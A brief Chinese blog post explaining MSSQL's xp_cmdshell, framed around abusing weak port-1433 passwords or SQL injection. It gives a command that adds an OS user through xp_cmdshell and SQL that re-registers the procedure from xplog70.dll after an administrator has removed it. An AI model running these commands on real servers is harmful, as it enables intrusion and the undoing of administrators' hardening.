什么是XP_CMDShell

XP_CMDShell是MSSQl的扩展存储过程,调用此存储过程可以直接使用操作系统的shell所以这个扩展存储过程在扫描到1433弱口令或注入时经常用来执行系统命令
格式为: exec master ..xp_cmdshell'net user 用户名 密码 /add'
当管理员删除XP_CMDShell时=============================
输入Exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell'  
返回1的话就说明回复成功
否则
就要上传一个xplog70.dll文件在进行恢复了.

文章来自: 本站原创
引用通告地址: http://www.cn-sohu.com/bolg/trackback.asp?tbID=162
Tags: